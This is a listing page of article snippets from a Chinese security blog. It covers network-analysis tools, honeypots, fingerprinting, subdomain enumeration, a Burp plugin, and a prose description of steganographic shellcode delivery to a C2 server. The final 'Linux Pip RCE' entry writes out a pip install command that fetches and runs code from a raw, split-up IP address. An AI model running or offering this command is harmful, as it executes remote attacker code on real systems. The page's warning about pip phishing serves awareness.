IpGeo 是一个 python 工具,用于从捕获的网络流量文件 (pcap/pcapng) 中提取 I...
03月07日15 views评论ip
数据包
蜜罐搭建,还原黑客对你服务器的操作过程
前言: 大家想必都知道蜜罐是什么,蜜罐是蓝队常用反制红队的手段之一,我们通过蜜罐来诱惑红队入侵,然后留下他们的记录,同时可以在蜜罐中加入一些...
03月04日20 views评论https
python
TideFinger – 指纹识别小工具
####################免责声明:工具本身并无好坏,希望大家以遵守《网络安全法》相关法律为前提来使用该工具,支持研究学习,切勿用于非法犯罪活动,对于恶意使用该工具造成的损失,和本人及开...
03月03日21 views评论python
工具
Typora白嫖B站图床(二)
免责声明本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。前言之前的白嫖B站图床用不了了,具体我就不截图了,直接上新方法。本地配置安装依赖 pip inst...
02月04日25 views评论python
公众号
黑客内网代理和穿透工具的分析记录
0x00 前言记录一下对内网代理和穿透工具的分析过程,着重在流量侧。0x01 环境攻击机器:192.168.1.131和192.168.1.133目标机器:192.168.1.137目标机器为双网卡,...
01月21日28 views评论https
python
burpsuite验证码识别插件(文末下载)
项目地址 https://github.com/smxiazi/NEW_xp_CAPTCHA 介绍 xp_CAPTCHA (白嫖版) 验证码识别 burp插件 支持验证码返回包为json格式 注意: ...
12月04日29 views评论com
https
一个简单的步骤让你的 Python 代码更干净
点击上方“萝卜大杂烩”,选择“星标”公众号超级无敌干货,第一时间送达!!!说起来容易做起来难,我们都知道代码可读性非常重要,但是写的时候总是随心所欲,不考虑类型提示、import 排序、PEP8 规范...
11月07日7 views评论hook
yaml
干货 | 通过人工准入实现C2上线
把shellcode载荷放在平台生成的隐写图片中,前锋马回传机器基础信息用于判断是否是沙箱或调试机,确认是真实目标,人为准入,目标机解析隐写图片shellcode后上线到c2。server端是djan...
11月04日24 views评论c
data
10 个 Python 脚本来自动化你的日常任务
英文:https://python.plainenglish.io/10-python-scripts-to-automate-your-daily-task-de1496fdf64a ...
10月27日安全开发29 views评论adb
自动化
一款功能强大的子域收集工具
功能强大的子域收集工具:OneForAll简介OneForAll 收集能力强大、支持子域爆破、支持子域验证、支持子域爬取、支持子域置换、支持子域接管、处理功能强大、速度极快、体验良好,是一款集百家之长...
10月26日41 views评论example
git
警惕诡异的pip install命令(linux系统)
昨天出了一个新的“洞”,pip远程命令执行,我们回顾一下,顺便谨防钓鱼攻击其实说实话,这个洞是有争议的,不过竟然有效果,那咱们就复现一波。首先脚本地址是在github的https://github.c...
10月26日20 views评论pip
rce
Linux Pip RCE (环境仅限半小时)
pip3 install "http://82"."156"."127"."149/Rce.png"原文始发于微信公众号(利刃信安):Linux Pip RCE (环境仅限半小时)
10月25日38 views评论pip
rce